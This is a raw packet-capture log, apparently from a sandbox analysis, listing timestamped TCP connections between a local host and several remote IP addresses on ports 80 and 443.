Nov 9, 2024 02:47:35.635746002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635746956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635767937 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635781050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635788918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635796070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635803938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635816097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635824919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635843039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635849953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635864019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635895014 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.635978937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635986090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.635998011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.636003017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.636008978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.636014938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.636029005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.636035919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.636035919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.636043072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.636044025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.636076927 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.636101961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637063026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637070894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637084007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637089968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637096882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637104034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637111902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637118101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637119055 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637145996 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637185097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637231112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637244940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637252092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637258053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637264013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637269974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637275934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637284994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637286901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637291908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637305021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637307882 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637310982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637317896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637326956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637329102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637337923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637356043 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637381077 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637392044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637398958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637411118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637417078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637422085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637434959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637442112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637447119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637449026 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637454987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637460947 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637461901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637469053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637471914 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637476921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637484074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637496948 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637501001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637512922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637516022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637536049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637543917 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637551069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637557030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637567997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637573957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637579918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637587070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637593985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637593985 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637593985 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637599945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637612104 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637614965 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637618065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637628078 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637628078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637636900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637644053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637649059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.637660980 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.637691021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.638323069 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.639355898 CET	53049	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.639367104 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.639719009 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.641138077 CET	53049	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.641206980 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.641463041 CET	53049	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.676935911 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.677939892 CET	53050	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.677969933 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.678436995 CET	53050	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.678442955 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.683335066 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.683969975 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.684367895 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.684395075 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.684815884 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.684822083 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.685543060 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.686029911 CET	53051	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.686045885 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.686491966 CET	53051	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.686496973 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.743120909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.743174076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.743180037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.743207932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.743304968 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.746418953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.746426105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.746438980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.746474028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.746514082 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.746817112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.746839046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.746844053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.746889114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.746953964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.746962070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.746972084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.747005939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.747437000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.747462988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.747467995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.747509003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.747539997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.747546911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.747562885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.747596025 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.747608900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.748599052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.748614073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.748620033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.748660088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.748684883 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.748691082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.748703003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.748709917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.748744965 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.749346018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.749351978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.749362946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.749392033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.749397993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.749433994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.749478102 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.795519114 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.796119928 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.796127081 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.796451092 CET	443	53059	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.796511889 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.796696901 CET	53059	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.796708107 CET	443	53059	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.797775984 CET	443	53059	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.797837019 CET	53059	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.798038960 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.798106909 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.799710989 CET	53059	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.799778938 CET	443	53059	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.800151110 CET	53055	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.803355932 CET	443	53060	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.806509972 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.806871891 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.806955099 CET	53049	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.808151960 CET	53060	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.808166027 CET	443	53060	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.809412003 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.809518099 CET	443	53060	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.809530020 CET	53049	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:35.809537888 CET	443	53049	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.809607029 CET	53060	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.809897900 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.809953928 CET	53050	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.810367107 CET	53050	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.810379028 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.810409069 CET	53050	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.810415983 CET	443	53050	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.810749054 CET	53060	443	192.168.2.7	23.198.7.182
Nov 9, 2024 02:47:35.810837030 CET	443	53060	23.198.7.182	192.168.2.7
Nov 9, 2024 02:47:35.812186956 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:35.812881947 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.812910080 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.812954903 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.812973976 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.813010931 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.814879894 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:35.814894915 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:35.815275908 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:35.815865040 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.815874100 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.815887928 CET	53052	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.815892935 CET	443	53052	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.817867041 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:35.817950964 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:35.818336010 CET	53065	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.818352938 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.818409920 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:35.818448067 CET	53065	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.818538904 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:35.818547010 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:35.818881989 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.818979979 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.819046974 CET	53051	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.819617987 CET	53065	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.819629908 CET	443	53065	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.819720984 CET	53051	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.819730997 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.819741011 CET	53051	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.819746017 CET	443	53051	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.822901964 CET	53066	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.822937965 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.823061943 CET	53066	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.836585999 CET	443	53056	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.843328953 CET	443	53055	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:35.852642059 CET	53066	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.852669001 CET	443	53066	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.853144884 CET	53056	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.853173971 CET	443	53056	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.853595972 CET	53067	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.853616953 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.853791952 CET	53067	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.853893042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.853903055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.853913069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.853924036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.853935003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.853997946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.853998899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.854274988 CET	53056	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.854280949 CET	443	53056	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.854357958 CET	53067	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:35.854365110 CET	443	53067	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:35.856306076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.856323957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.856336117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.856345892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.856358051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.856383085 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.856415033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.858503103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858515024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858553886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.858776093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858822107 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.858823061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858843088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858855009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858865976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858866930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.858877897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858891964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858906031 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.858935118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.858936071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858953953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858964920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858975887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.858975887 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859006882 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859034061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859059095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859069109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859093904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859100103 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859107971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859119892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859131098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859134912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859153986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859181881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859216928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859229088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859240055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859251976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859256983 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859287024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859288931 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859301090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859318018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859333992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859335899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859347105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859371901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859384060 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859390974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859406948 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859409094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859437943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859447002 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859458923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859471083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859483004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859493017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859527111 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859544992 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.859730005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.859776020 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860011101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860057116 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860141039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860225916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860300064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860312939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860323906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860353947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860358000 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860373020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860383987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860392094 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860397100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860409021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860418081 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860440969 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860457897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860645056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860656977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860668898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860681057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860694885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860702038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.860727072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.860733032 CET	52982	80	192.168.2.7	77.220.212.32
